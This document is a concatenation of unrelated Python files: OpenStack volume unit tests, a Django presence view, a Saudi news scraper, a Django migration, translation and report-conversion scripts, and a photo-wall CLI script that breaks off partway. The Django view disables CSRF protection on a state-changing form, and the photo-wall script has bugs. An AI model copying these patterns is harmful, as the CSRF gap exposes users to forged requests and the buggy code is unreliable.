        attached_volume = meta.obj_to_munch(fakes.FakeVolume(**vol))
        rattach = {'server_id': server['id'], 'device': 'device001',
                   'volumeId': volume['id'], 'id': 'attachmentId'}
        self.register_uris([
            dict(method='POST',
                 uri=self.get_mock_url(
                     'compute', 'public',
                     append=['servers', server['id'],
                             'os-volume_attachments']),
                 json={'volumeAttachment': rattach},
                 validate=dict(json={
                     'volumeAttachment': {
                         'volumeId': vol['id']}})),
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public', append=['volumes', 'detail']),
                 json={'volumes': [volume]}),
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public', append=['volumes', 'detail']),
                 json={'volumes': [attached_volume]})])
        # defaults to wait=True
        ret = self.cloud.attach_volume(server, volume)
        self.assertEqual(rattach, ret)
        self.assert_calls()

    def test_attach_volume_wait_error(self):
        server = dict(id='server001')
        vol = {'id': 'volume001', 'status': 'available',
               'name': '', 'attachments': []}
        volume = meta.obj_to_munch(fakes.FakeVolume(**vol))
        vol['status'] = 'error'
        errored_volume = meta.obj_to_munch(fakes.FakeVolume(**vol))
        rattach = {'server_id': server['id'], 'device': 'device001',
                   'volumeId': volume['id'], 'id': 'attachmentId'}
        self.register_uris([
            dict(method='POST',
                 uri=self.get_mock_url(
                     'compute', 'public',
                     append=['servers', server['id'],
                             'os-volume_attachments']),
                 json={'volumeAttachment': rattach},
                 validate=dict(json={
                     'volumeAttachment': {
                         'volumeId': vol['id']}})),
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public', append=['volumes', 'detail']),
                 json={'volumes': [errored_volume]})])

        with testtools.ExpectedException(
            openstack.cloud.OpenStackCloudException,
            "Error in attaching volume %s" % errored_volume['id']
        ):
            self.cloud.attach_volume(server, volume)
        self.assert_calls()

    def test_attach_volume_not_available(self):
        server = dict(id='server001')
        volume = dict(id='volume001', status='error', attachments=[])

        with testtools.ExpectedException(
            openstack.cloud.OpenStackCloudException,
            "Volume %s is not available. Status is '%s'" % (
                volume['id'], volume['status'])
        ):
            self.cloud.attach_volume(server, volume)
        self.assertEqual(0, len(self.adapter.request_history))

    def test_attach_volume_already_attached(self):
        device_id = 'device001'
        server = dict(id='server001')
        volume = dict(id='volume001',
                      attachments=[
                          {'server_id': 'server001', 'device': device_id}
                      ])

        with testtools.ExpectedException(
            openstack.cloud.OpenStackCloudException,
            "Volume %s already attached to server %s on device %s" % (
                volume['id'], server['id'], device_id)
        ):
            self.cloud.attach_volume(server, volume)
        self.assertEqual(0, len(self.adapter.request_history))

    def test_detach_volume(self):
        server = dict(id='server001')
        volume = dict(id='volume001',
                      attachments=[
                          {'server_id': 'server001', 'device': 'device001'}
                      ])
        self.register_uris([
            dict(method='DELETE',
                 uri=self.get_mock_url(
                     'compute', 'public',
                     append=['servers', server['id'],
                             'os-volume_attachments', volume['id']]))])
        self.cloud.detach_volume(server, volume, wait=False)
        self.assert_calls()

    def test_detach_volume_exception(self):
        server = dict(id='server001')
        volume = dict(id='volume001',
                      attachments=[
                          {'server_id': 'server001', 'device': 'device001'}
                      ])
        self.register_uris([
            dict(method='DELETE',
                 uri=self.get_mock_url(
                     'compute', 'public',
                     append=['servers', server['id'],
                             'os-volume_attachments', volume['id']]),
                 status_code=404)])
        with testtools.ExpectedException(
            openstack.cloud.OpenStackCloudURINotFound,
            "Error detaching volume %s from server %s" % (
                volume['id'], server['id'])
        ):
            self.cloud.detach_volume(server, volume, wait=False)
        self.assert_calls()

    def test_detach_volume_wait(self):
        server = dict(id='server001')
        attachments = [{'server_id': 'server001', 'device': 'device001'}]
        vol = {'id': 'volume001', 'status': 'attached', 'name': '',
               'attachments': attachments}
        volume = meta.obj_to_munch(fakes.FakeVolume(**vol))
        vol['status'] = 'available'
        vol['attachments'] = []
        avail_volume = meta.obj_to_munch(fakes.FakeVolume(**vol))
        self.register_uris([
            dict(method='DELETE',
                 uri=self.get_mock_url(
                     'compute', 'public',
                     append=['servers', server['id'],
                             'os-volume_attachments', volume.id])),
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public', append=['volumes', 'detail']),
                 json={'volumes': [avail_volume]})])
        self.cloud.detach_volume(server, volume)
        self.assert_calls()

    def test_detach_volume_wait_error(self):
        server = dict(id='server001')
        attachments = [{'server_id': 'server001', 'device': 'device001'}]
        vol = {'id': 'volume001', 'status': 'attached', 'name': '',
               'attachments': attachments}
        volume = meta.obj_to_munch(fakes.FakeVolume(**vol))
        vol['status'] = 'error'
        vol['attachments'] = []
        errored_volume = meta.obj_to_munch(fakes.FakeVolume(**vol))
        self.register_uris([
            dict(method='DELETE',
                 uri=self.get_mock_url(
                     'compute', 'public',
                     append=['servers', server['id'],
                             'os-volume_attachments', volume.id])),
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public', append=['volumes', 'detail']),
                 json={'volumes': [errored_volume]})])
        with testtools.ExpectedException(
            openstack.cloud.OpenStackCloudException,
            "Error in detaching volume %s" % errored_volume['id']
        ):
            self.cloud.detach_volume(server, volume)
        self.assert_calls()

    def test_delete_volume_deletes(self):
        vol = {'id': 'volume001', 'status': 'attached',
               'name': '', 'attachments': []}
        volume = meta.obj_to_munch(fakes.FakeVolume(**vol))
        self.register_uris([
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public', append=['volumes', 'detail']),
                 json={'volumes': [volume]}),
            dict(method='DELETE',
                 uri=self.get_mock_url(
                     'volumev2', 'public', append=['volumes', volume.id])),
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public', append=['volumes', 'detail']),
                 json={'volumes': []})])
        self.assertTrue(self.cloud.delete_volume(volume['id']))
        self.assert_calls()

    def test_delete_volume_gone_away(self):
        vol = {'id': 'volume001', 'status': 'attached',
               'name': '', 'attachments': []}
        volume = meta.obj_to_munch(fakes.FakeVolume(**vol))
        self.register_uris([
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public', append=['volumes', 'detail']),
                 json={'volumes': [volume]}),
            dict(method='DELETE',
                 uri=self.get_mock_url(
                     'volumev2', 'public', append=['volumes', volume.id]),
                 status_code=404)])
        self.assertFalse(self.cloud.delete_volume(volume['id']))
        self.assert_calls()

    def test_delete_volume_force(self):
        vol = {'id': 'volume001', 'status': 'attached',
               'name': '', 'attachments': []}
        volume = meta.obj_to_munch(fakes.FakeVolume(**vol))
        self.register_uris([
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public', append=['volumes', 'detail']),
                 json={'volumes': [volume]}),
            dict(method='POST',
                 uri=self.get_mock_url(
                     'volumev2', 'public',
                     append=['volumes', volume.id, 'action']),
                 validate=dict(
                     json={'os-force_delete': None})),
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public', append=['volumes', 'detail']),
                 json={'volumes': []})])
        self.assertTrue(self.cloud.delete_volume(volume['id'], force=True))
        self.assert_calls()

    def test_set_volume_bootable(self):
        vol = {'id': 'volume001', 'status': 'attached',
               'name': '', 'attachments': []}
        volume = meta.obj_to_munch(fakes.FakeVolume(**vol))
        self.register_uris([
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public', append=['volumes', 'detail']),
                 json={'volumes': [volume]}),
            dict(method='POST',
                 uri=self.get_mock_url(
                     'volumev2', 'public',
                     append=['volumes', volume.id, 'action']),
                 json={'os-set_bootable': {'bootable': True}}),
        ])
        self.cloud.set_volume_bootable(volume['id'])
        self.assert_calls()

    def test_set_volume_bootable_false(self):
        vol = {'id': 'volume001', 'status': 'attached',
               'name': '', 'attachments': []}
        volume = meta.obj_to_munch(fakes.FakeVolume(**vol))
        self.register_uris([
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public', append=['volumes', 'detail']),
                 json={'volumes': [volume]}),
            dict(method='POST',
                 uri=self.get_mock_url(
                     'volumev2', 'public',
                     append=['volumes', volume.id, 'action']),
                 json={'os-set_bootable': {'bootable': False}}),
        ])
        self.cloud.set_volume_bootable(volume['id'])
        self.assert_calls()

    def test_list_volumes_with_pagination(self):
        vol1 = meta.obj_to_munch(fakes.FakeVolume('01', 'available', 'vol1'))
        vol2 = meta.obj_to_munch(fakes.FakeVolume('02', 'available', 'vol2'))
        self.register_uris([
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public',
                     append=['volumes', 'detail']),
                 json={
                     'volumes': [vol1],
                     'volumes_links': [
                         {'href': self.get_mock_url(
                             'volumev2', 'public',
                             append=['volumes', 'detail'],
                             qs_elements=['marker=01']),
                          'rel': 'next'}]}),
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public',
                     append=['volumes', 'detail'],
                     qs_elements=['marker=01']),
                 json={
                     'volumes': [vol2],
                     'volumes_links': [
                         {'href': self.get_mock_url(
                             'volumev2', 'public',
                             append=['volumes', 'detail'],
                             qs_elements=['marker=02']),
                          'rel': 'next'}]}),
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public',
                     append=['volumes', 'detail'],
                     qs_elements=['marker=02']),
                 json={'volumes': []})])
        self.assertEqual(
            [self.cloud._normalize_volume(vol1),
             self.cloud._normalize_volume(vol2)],
            self.cloud.list_volumes())
        self.assert_calls()

    def test_list_volumes_with_pagination_next_link_fails_once(self):
        vol1 = meta.obj_to_munch(fakes.FakeVolume('01', 'available', 'vol1'))
        vol2 = meta.obj_to_munch(fakes.FakeVolume('02', 'available', 'vol2'))
        self.register_uris([
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public',
                     append=['volumes', 'detail']),
                 json={
                     'volumes': [vol1],
                     'volumes_links': [
                         {'href': self.get_mock_url(
                             'volumev2', 'public',
                             append=['volumes', 'detail'],
                             qs_elements=['marker=01']),
                          'rel': 'next'}]}),
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public',
                     append=['volumes', 'detail'],
                     qs_elements=['marker=01']),
                 status_code=404),
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public',
                     append=['volumes', 'detail']),
                 json={
                     'volumes': [vol1],
                     'volumes_links': [
                         {'href': self.get_mock_url(
                             'volumev2', 'public',
                             append=['volumes', 'detail'],
                             qs_elements=['marker=01']),
                          'rel': 'next'}]}),
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public',
                     append=['volumes', 'detail'],
                     qs_elements=['marker=01']),
                 json={
                     'volumes': [vol2],
                     'volumes_links': [
                         {'href': self.get_mock_url(
                             'volumev2', 'public',
                             append=['volumes', 'detail'],
                             qs_elements=['marker=02']),
                          'rel': 'next'}]}),

            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public',
                     append=['volumes', 'detail'],
                     qs_elements=['marker=02']),
                 json={'volumes': []})])
        self.assertEqual(
            [self.cloud._normalize_volume(vol1),
             self.cloud._normalize_volume(vol2)],
            self.cloud.list_volumes())
        self.assert_calls()

    def test_list_volumes_with_pagination_next_link_fails_all_attempts(self):
        vol1 = meta.obj_to_munch(fakes.FakeVolume('01', 'available', 'vol1'))
        uris = []
        attempts = 5
        for i in range(attempts):
            uris.extend([
                dict(method='GET',
                     uri=self.get_mock_url(
                         'volumev2', 'public',
                         append=['volumes', 'detail']),
                     json={
                         'volumes': [vol1],
                         'volumes_links': [
                             {'href': self.get_mock_url(
                                 'volumev2', 'public',
                                 append=['volumes', 'detail'],
                                 qs_elements=['marker=01']),
                              'rel': 'next'}]}),
                dict(method='GET',
                     uri=self.get_mock_url(
                         'volumev2', 'public',
                         append=['volumes', 'detail'],
                         qs_elements=['marker=01']),
                     status_code=404)])
        self.register_uris(uris)
        # Check that found volumes are returned even if pagination didn't
        # complete because call to get next link 404'ed for all the allowed
        # attempts
        self.assertEqual(
            [self.cloud._normalize_volume(vol1)],
            self.cloud.list_volumes())
        self.assert_calls()

    def test_get_volume_by_id(self):
        vol1 = meta.obj_to_munch(fakes.FakeVolume('01', 'available', 'vol1'))
        self.register_uris([
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public',
                     append=['volumes', '01']),
                 json={'volume': vol1}
                 )
        ])
        self.assertEqual(
            self.cloud._normalize_volume(vol1),
            self.cloud.get_volume_by_id('01'))
        self.assert_calls()

    def test_create_volume(self):
        vol1 = meta.obj_to_munch(fakes.FakeVolume('01', 'available', 'vol1'))
        self.register_uris([
            dict(method='POST',
                 uri=self.get_mock_url(
                     'volumev2', 'public', append=['volumes']),
                 json={'volume': vol1},
                 validate=dict(json={
                     'volume': {
                         'size': 50,
                         'name': 'vol1',
                     }})),
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public',
                     append=['volumes', 'detail']),
                 json={'volumes': [vol1]}),
        ])

        self.cloud.create_volume(50, name='vol1')
        self.assert_calls()

    def test_create_bootable_volume(self):
        vol1 = meta.obj_to_munch(fakes.FakeVolume('01', 'available', 'vol1'))
        self.register_uris([
            dict(method='POST',
                 uri=self.get_mock_url(
                     'volumev2', 'public', append=['volumes']),
                 json={'volume': vol1},
                 validate=dict(json={
                     'volume': {
                         'size': 50,
                         'name': 'vol1',
                     }})),
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public',
                     append=['volumes', 'detail']),
                 json={'volumes': [vol1]}),
            dict(method='POST',
                 uri=self.get_mock_url(
                     'volumev2', 'public',
                     append=['volumes', '01', 'action']),
                 validate=dict(
                     json={'os-set_bootable': {'bootable': True}})),
        ])

        self.cloud.create_volume(50, name='vol1', bootable=True)
        self.assert_calls()

#!/usr/bin/python

from django.http import HttpResponse
from django.template import RequestContext, loader
from django.views.decorators.csrf import csrf_exempt
import django.shortcuts

from wlokalu.api import presence

#-----------------------------------------------------------------------------

from wlokalu.logging import getLogger, message as log
logger = getLogger(__name__)

#-----------------------------------------------------------------------------

@csrf_exempt
def list(request, nick = None):
  template = loader.get_template("list.html")

  from django.core.urlresolvers import reverse
  from forms import PresenceForm
  form = PresenceForm()
  if nick is not None:
    form.initial['nick'] = nick
    form_target = reverse(list, kwargs = {'nick': nick})
  else:
    form_target = reverse(list)

  if request.POST.get('nick', '') != '':
    context = {
      'address': request.META['REMOTE_ADDR'],
      'uri': request.META['REQUEST_URI'],
    }
    if 'enter' in request.POST:
      presence.person_entered(request.POST['nick'], context)
    else: # 'leave' in request.POST
      presence.person_left(request.POST['nick'], context)
    # tell the browser to reload the page, but with GET request
    return django.shortcuts.redirect(request.path)

  context = RequestContext(request, {
    'form_target': form_target,
    'form': form,
    'present': presence.list_people(),
    'sensors': presence.list_simple_sensors(),
    'complex_sensors': presence.list_complex_sensors(),
  })
  return HttpResponse(template.render(context))

#-----------------------------------------------------------------------------
# vim:ft=python:foldmethod=marker

from urllib.request import urlopen
from urllib.parse import urlparse, parse_qs
from socket import error as SocketError
import errno
from bs4 import BeautifulSoup

MAX_PAGES_TO_SEARCH = 3

def parse_news(item):
    '''Parse news item
    return is a tuple(id, title, url)
    '''
    url = 'http://www.spa.gov.sa' + item['href']
    url_parsed = urlparse(url)
    qs = parse_qs(url_parsed[4])
    id = qs['newsid'][0]
    title = item.h2.contents[0]
    title = " ".join(title.split())
    item_parsed = (id, title, url)
    return item_parsed


def retrieve_news(person=0, royal=0, cabinet=0,  last_id=-1):
    '''Retrieve news for person or royal
    person 1= king, 2= crown prince and 3= deputy crown prince
    if royal is = 1 news will be retriveved
    if last_id not definend it will return the max
    return list of news tuples up to MAX_PAGES_TO_SEARCH (page = 10 news)
    [(id, title, url)...]
    '''
    all_news = []
    found  = False
    page = 1
    while (page <= MAX_PAGES_TO_SEARCH and not found):
        url = ("http://www.spa.gov.sa/ajax/listnews.php?sticky={}&cat=0&cabine"
        "t={}&royal={}&lang=ar&pg={}".format(person, cabinet, royal,  page))
        try:
            html = urlopen(url)
            soup = BeautifulSoup(html, "html.parser")
            news  =  soup.find_all("a", class_="aNewsTitle")
            for item in news:
                item_parsed = parse_news(item)
                if item_parsed[0] <= str(last_id):
                    found = True
                    break
                all_news.append(item_parsed)
        except SocketError as e:
            if e.errno != errno.ECONNRESET:
                raise
            pass
        page = page + 1
    return all_news


def retrieve_detail(item):
    '''Retrive detaill for news item
    return is tuple (id, title, url, text)
    '''
    url = item[2]
    html = urlopen(url)
    soup = BeautifulSoup(html, 'html.parser')
    detail = soup.find(class_='divNewsDetailsText')
    detail = detail.get_text()
    _list  = list(item)
    _list.insert(3, detail)
    item = tuple(_list)
    return item


def royal_order(last_id=-1):
    '''Retrive royal orders
    if last_id not defiend it will return the max
    return list of royal orders tuples up to MAX_PAGES_TO_SEARCH (page=10)
    [(id, title, url, text)...]
    '''
    orders = []
    _news = retrieve_news(royal=1, last_id=last_id)
    for item in _news:
        _detail = retrieve_detail(item)
        orders.append(_detail)
    return orders


def cabinet_decision(last_id=-1):
    '''Retrive cabinet decisions
    if last_id not defiend it will return the max
    return list of cabinet decisions tuples up to MAX_PAGES_TO_SEARCH (page=10)
    [(id, title, url, text)...]
    '''
    decisions = []
    _news = retrieve_news(cabinet=1, last_id=last_id)
    for item in _news:
        _detail = retrieve_detail(item)
        decisions.append(_detail)
    return decisions


def arrival_news(person, last_id=-1):
    '''Retrive only arrival news for person
    if last_id not defiend it will return the max
    return list of arrival news tuples up to MAX_PAGES_TO_SEARCH (page = 10 news)
    [(id, title, url, location)...]
    '''
    arrival_news = []
    all_news = retrieve_news(person=person, last_id= last_id)
    for item in all_news:
        if 'يصل إلى' in item[1]:
            _list = list(item)
            _list.insert(3, (item[1].split('يصل إلى'))[1].split('قادماً من')[0])
            item = tuple(_list)
            arrival_news.append(item)
    return arrival_news


def leave_news(person, last_id=-1):
    '''Retrive only leave news for person
    if last_id not defiend it will return the max
    return list of leave news tuples up to MAX_PAGES_TO_SEARCH (page = 10 news)
    [(id, title, url, locationFromTo)...]
    '''
    leave_news = []
    all_news = retrieve_news(person=person, last_id= last_id)
    for item in all_news:
        if 'يغادر' in item[1]:
            _list = list(item)
            _list.insert(3, item[1].split('يغادر')[1])
            item = tuple(_list)
            leave_news.append(item)
    return leave_news


if __name__ == "__main__":
    # just for testing
    news = cabinet_decision()
    print(news)

import time
from threading import Thread
import threading
from wtfj_ids import *
from wtfj_utils import *

class Printer:
	''' Opens a new output window and prints messages sent to it '''
	def __init__(self,header=''):
		self._header = header

	def send(self,string):
		print(self._header+string)

class Console:
	''' Allows user to enter commands '''
	def __init__(self,prompt='[$] '):
		self._prompt = prompt
		self._at = ''

	def poll(self,wait_s=None,uid=None):
		try:
			prompt = str(self._at)+str(self._prompt)
			msg = raw_input(prompt)
			if msg == '':
				self._at = ''
				return []
			if msg[0] == '@':
				self._at = msg.split()[0]+' '
			else:
				msg = self._at+msg
			return [msg]
		except Exception as e:
			print(repr(e))
			return []

	def subscribe(self,*uids):
		pass

class Script:
	''' Runs a script passed as a list, default frequency = 1000Hz '''
	def __init__(self,msgs):
		self._msgs = msgs
		self._index = 0
		self._period = 0.001
		self._pid = 'SCRIPT'
	
	def poll(self,wait_s=None,uid=None):
		period = self._period if wait_s is None else wait_s
		time.sleep(period)
		try:
			msg = self._msgs[self._index]
			print(self._pid+' SEND > '+msg)
			self._index += 1
			return [msg]
		except IndexError:
			return []

	def subscribe(self,*uids):
		for uid in uids:
			if uid is not None:
				if uid[0] is '@': assert uid[1:] in get_attr(Uid)
				else: assert uid in get_attr(Uid)
		return self

	def load(self,msg_array):
		self._msgs += msg_array
		return self

	def set_period(self,period):
		self._period = period
		return self

	def run(self):
		t = threading.current_thread()
		self._pid = str(t.ident)+' '+str(t.name)
		while len(self.poll()) > 0: pass

	def run_async(self):
		Thread(target=self.run).start()


if __name__ == '__main__':
	
	Printer('A simple printer: ').send('Just printing a msg to current_thread')

	script = [
		'@other_uid topic data',
		'@other_uid topic',
		'uid topic data',
		'uid topic'
	]

	async = ['async topic '+str(n) for n in [1,2,3,4,5,6,7,8,9,0]]
	async2 = ['async2 topic '+str(n) for n in [1,2,3,4,5,6,7,8,9,0]]

	Script(script).set_period(1).run()
	Script(async).set_period(0.15).run_async()
	Script(async2).set_period(0.2).run_async()
# -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2016-11-03 08:56
from __future__ import unicode_literals

from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion


class Migration(migrations.Migration):

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('snapventure', '0004_auto_20161102_2043'),
    ]

    operations = [
        migrations.CreateModel(
            name='Inscription',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=255)),
                ('created', models.DateTimeField(auto_now_add=True)),
                ('last_updated', models.DateTimeField(auto_now=True)),
                ('journey', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='snapventure.Journey')),
            ],
        ),
        migrations.CreateModel(
            name='Profile',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('bio', models.TextField(blank=True, max_length=500)),
                ('location', models.CharField(blank=True, max_length=30)),
                ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.AddField(
            model_name='inscription',
            name='user',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='snapventure.Profile'),
        ),
        migrations.AddField(
            model_name='journey',
            name='inscriptions',
            field=models.ManyToManyField(through='snapventure.Inscription', to='snapventure.Profile'),
        ),
    ]

import os
import re
import subprocess

# Copied from Trojita
"""Fetch the .po files from KDE's SVN for GCompris

Run me from GCompris's top-level directory.
"""


SVN_PATH = "svn://anonsvn.kde.org/home/kde/trunk/l10n-kf5/"
SOURCE_PO_PATH = "/messages/kdereview/gcompris_qt.po"
OUTPUT_PO_PATH = "./po/"
OUTPUT_PO_PATTERN = "gcompris_%s.po"

fixer = re.compile(r'^#~\| ', re.MULTILINE)
re_empty_msgid = re.compile('^msgid ""$', re.MULTILINE)
re_empty_line = re.compile('^$', re.MULTILINE)
re_has_qt_contexts = re.compile('X-Qt-Contexts: true\\n')

if not os.path.exists(OUTPUT_PO_PATH):
    os.mkdir(OUTPUT_PO_PATH)

all_languages = subprocess.check_output(['svn', 'cat', SVN_PATH + 'subdirs'],
                                       stderr=subprocess.STDOUT)

all_languages = [x.strip() for x in all_languages.split("\n") if len(x)]
all_languages.remove("x-test")
for lang in all_languages:
    try:
        raw_data = subprocess.check_output(['svn', 'cat', SVN_PATH + lang + SOURCE_PO_PATH],
                                          stderr=subprocess.PIPE)
        (transformed, subs) = fixer.subn('# ~| ', raw_data)
        pos1 = re_empty_msgid.search(transformed).start()
        pos2 = re_empty_line.search(transformed).start()
        if re_has_qt_contexts.search(transformed, pos1, pos2) is None:
            transformed = transformed[:pos2] + \
                    '"X-Qt-Contexts: true\\n"\n' + \
                    transformed[pos2:]
            subs = subs + 1
        if (subs > 0):
            print "Fetched %s (and performed %d cleanups)" % (lang, subs)
        else:
            print "Fetched %s" % lang
        file(OUTPUT_PO_PATH + OUTPUT_PO_PATTERN % lang, "wb").write(transformed)
    except subprocess.CalledProcessError:
        print "No data for %s" % lang

# Inform qmake about the updated file list
#os.utime("CMakeLists.txt", None)


#! /usr/bin/python

from xml.sax.saxutils import escape
import re

def ConvertDiagnosticLineToSonqarqube(item):
    try:
        id, line, message, source_file = GetDiagnosticFieldsFromDiagnosticLine(item)
        WriteDiagnosticFieldsToFile(id, line, message, source_file)
    except:
        print 'Cant parse line {}'.format(item)


def GetDiagnosticFieldsFromDiagnosticLine(item):
    source_file = re.search('\/(.*?):', item).group(0).replace(':', '')
    line = re.search(':\d*:', item).group(0).replace(':', '')
    id = re.search('\[.*\]', item).group(0).replace('[', '').replace(']', '') + '-clang-compiler'
    message = re.search('warning: (.*)\[', item).group(0).replace('[', '').replace('warning: ', '')
    return id, line, message, source_file


def WriteDiagnosticFieldsToFile(id, line, message, source_file):
    clang_sonar_report.write(" <error file=\"" + str(source_file) +
                        "\" line=\"" + str(line) +
                        "\" id=\"" + str(id) +
                        "\" msg=\"" + escape(str(message)) + "\"/>\n")


def CreateOutputFile():
    file_to_write = open('clang_compiler_report.xml', 'w')
    file_to_write.write('<?xml version="1.0" encoding="UTF-8"?>\n')
    file_to_write.write('<results>\n')
    return file_to_write


def ReadCompilerReportFile():
    file = open('clang_compiler_report_formatted', 'r')
    messages_xml = file.readlines()
    return messages_xml


def CloseOutputFile():
    clang_sonar_report.write('</results>\n')
    clang_sonar_report.close()


def WriteSonarRulesToOutputFile():
    item_list = clang_compiler_report
    for item in item_list:
        ConvertDiagnosticLineToSonqarqube(item)


if __name__ == '__main__':
    clang_sonar_report = CreateOutputFile()
    clang_compiler_report = ReadCompilerReportFile()

    WriteSonarRulesToOutputFile()
    CloseOutputFile()

#!/usr/bin/env python

import os
import tempfile
import pipes
import subprocess
import time
import random
import shutil

try:
  from wand.image import Image
  from wand.display import display
except ImportError as e:
  # cd /usr/lib/
  # ln -s libMagickWand-6.Q16.so libMagickWand.so
  print("Couldn't import Wand package.")
  print("Please refer to #http://dahlia.kr/wand/ to install it.")
  import traceback; traceback.print_exc()
  raise e

try:
  import magic
  mime = magic.Magic()
except ImportError:
  mime = None
  #https://github.com/ahupp/python-magic

try:
  from docopt import docopt
except ImportError:
  print("Couldn't import Docopt package.")
  print("Please refer to#https://github.com/docopt/docopt to install it.")
  print("/!\\ Option parsing not possible, defaulting to hardcoded values/!\\")

def to_bool(val):
  if val is None:
    return false
  return val == 1
  
def to_int(val):
  return int(val)
  
def to_str(val):
  return val

def to_path(val):
  return val

OPT_TO_KEY = {
 '--do-wrap'        : ("DO_WRAP", to_bool),
 '--line-height': ("LINE_HEIGHT", to_int),
 '--nb-lines'        : ('LINES', to_int),
 '--no-caption'        : ("WANT_NO_CAPTION", to_bool),
'--force-no-vfs': ("FORCE_VFS", to_bool),
 '--force-vfs'        : ("FORCE_NO_VFS", to_bool),
 '--pick-random': ("PICK_RANDOM", to_bool),
 '--put-random'        : ("PUT_RANDOM", to_bool),
 '--resize'        : ("DO_RESIZE", to_bool),
 '--sleep'        : ('SLEEP_TIME', to_int),
 '--width'        : ('WIDTH', to_int),
'--no-switch-to-mini': ("NO_SWITCH_TO_MINI", to_bool),
 '<path>'        : ('PATH', to_path),
 '<target>'        : ('TARGET', to_path),
 '--polaroid'        : ("DO_POLAROID", to_bool),
 '--format'        : ("IMG_FORMAT_SUFFIX", to_str),
 '--crop-size'        : ("CROP_SIZE", to_int),
 '~~use-vfs'        : ("USE_VFS", to_bool),
 '--help'        : ("HELP", to_bool)
}

KEY_TO_OPT = dict([(key, (opt, ttype)) for opt, (key, ttype) in OPT_TO_KEY.items()])

PARAMS = {
"PATH" : "/home/kevin/mount/first",
"TARGET" : "/tmp/final.png",
#define the size of the picture
"WIDTH" : 2000,

#define how many lines do we want
"LINES": 2,

"LINE_HEIGHT": 200,

#minimum width of cropped image. Below that, we black it out
#only for POLAROID
"CROP_SIZE": 1000,

"IMG_FORMAT_SUFFIX": ".png",

# False if PATH is a normal directory, True if it is WebAlbums-FS
"USE_VFS": False,
"FORCE_VFS": False,
"FORCE_NO_VFS": False,

# True if end-of-line photos are wrapped to the next line
"DO_WRAP": False,
# True if we want a black background and white frame, plus details
"DO_POLAROID": True,

"WANT_NO_CAPTION": True,

# False if we want to add pictures randomly
"PUT_RANDOM": False,

"DO_RESIZE": False,

### VFS options ###

"NO_SWITCH_TO_MINI": False,

### Directory options ###

# False if we pick directory images sequentially, false if we take them randomly
"PICK_RANDOM": False, #not implemented yet

## Random wall options ##
"SLEEP_TIME": 0,

"HELP": False
}

DEFAULTS = dict([(key, value) for key, value in PARAMS.items()])
DEFAULTS_docstr = dict([(KEY_TO_OPT[key][0], value) for key, value in PARAMS.items()])

usage = """Photo Wall for WebAlbums 3.

Usage: 
  photowall.py <path> <target> [options]

Arguments:
  <path>        The path where photos are picked up from. [default: %(<path>)s]
  <target>      The path where the target photo is written. Except in POLAROID+RANDOM mode, the image will be blanked out first. [default: %(<target>)s]

Options:
  --polaroid              Use polaroid-like images for the wall
  --width <width>         Set final image width. [default: %(--width)d]
  --nb-lines <nb>         Number on lines of the target image. [default: %(--nb-lines)d]
  --resize                Resize images before putting in the wall. [default: %(--resize)s]
  --line-height <height>  Set the height of a single image. [default: %(--line-height)d]
  --do-wrap               If not POLAROID, finish images on the next line. [default: %(--do-wrap)s]
  --help                  Display this message

Polaroid mode options:
  --crop-size <crop>      Minimum size to allow cropping an image. [default: %(--crop-size)s]
  --no-caption            Disable caption. [default: %(--no-caption)s] 
  --put-random            Put images randomly instead of linearily. [default: %(--put-random)s]
  --sleep <time>          If --put-random, time (in seconds) to go asleep before adding a new image. [default: %(--sleep)d]

Filesystem options:
  --force-vfs             Treat <path> as a VFS filesystem. [default: %(--force-vfs)s]
  --force-no-vfs          Treat <path> as a normal filesystem. [default: %(--force-no-vfs)s]
  --no-switch-to-mini     If VFS, don't switch from the normal image to the miniature. [default: %(--no-switch-to-mini)s]
  --pick-random           If not VFS, pick images randomly in the <path> folder. [default: %(--pick-random)s]
  """ % DEFAULTS_docstr


class UpdateCallback:
  def newExec(self):
    pass
  
  def newImage(self, row=0, col=0, filename=""):
    print("%d.%d > %s" % (row, col, filename))
    
  def updLine(self, row, tmpLine):
    #print("--- %d ---" % row)
    pass
  
  def newFinal(self, name):
    pass
  
  def finished(self, name):
    print("==========")

  def stopRequested(self):
    return False
  
  def checkPause(self):
    pass

updateCB = UpdateCallback()

if __name__ == "__main__":
    arguments = docopt(usage, version="3.5-dev")

    if arguments["--help"]:
        print(usage)
        exit()

    param_args = dict([(OPT_TO_KEY[opt][0], OPT_TO_KEY[opt][1](value)) for opt, value in arguments.items()])

